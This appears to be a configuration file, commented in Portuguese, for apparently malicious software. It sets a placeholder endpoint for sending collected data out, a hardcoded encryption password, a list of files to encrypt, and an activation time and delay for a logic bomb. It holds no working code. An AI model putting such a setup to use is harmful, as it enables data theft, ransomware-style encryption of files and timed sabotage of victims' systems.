API_URL=http://example.com/api  # URL para o endpoint da API
DATA_COLLECTION_URL=http://example.com/collect_data  # URL para onde os dados serão enviados
CRYPTO_PASSWORD=mysecretpassword  # Senha para criptografia
FILES_TO_ENCRYPT=['path/to/important_file1.txt', 'path/to/important_file2.txt']  # Caminhos dos arquivos a serem criptografados
BOMB_ACTIVATION_TIME=2024-12-31 23:59:59  # Data e hora da ativação da bomba lógica
BOMB_DELAY=3600  # Tempo de espera em segundos para a ativação da bomba lógica
